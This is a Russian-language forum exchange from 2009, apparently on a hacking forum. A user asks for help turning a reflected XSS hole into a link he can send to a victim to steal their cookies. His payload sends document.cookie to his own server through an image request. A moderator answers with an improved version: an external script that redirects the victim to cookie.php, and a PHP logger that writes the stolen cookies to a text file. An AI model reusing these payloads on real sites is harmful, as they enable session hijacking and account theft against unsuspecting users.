21.11.2009, 11:11
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от xofffff
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы  Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>
PHP код:
function cookie(){
window.location="cookie.php?data="+document.cookie;
}
в cookie.php
PHP код:
<?PHP
$file=fopen('cookie.txt', 'A+');
fwrite($file, $_GET['data']);
fclose($file);
?>
ps
Файл cookie.txt должны быть разрешены для записи.
|
|
|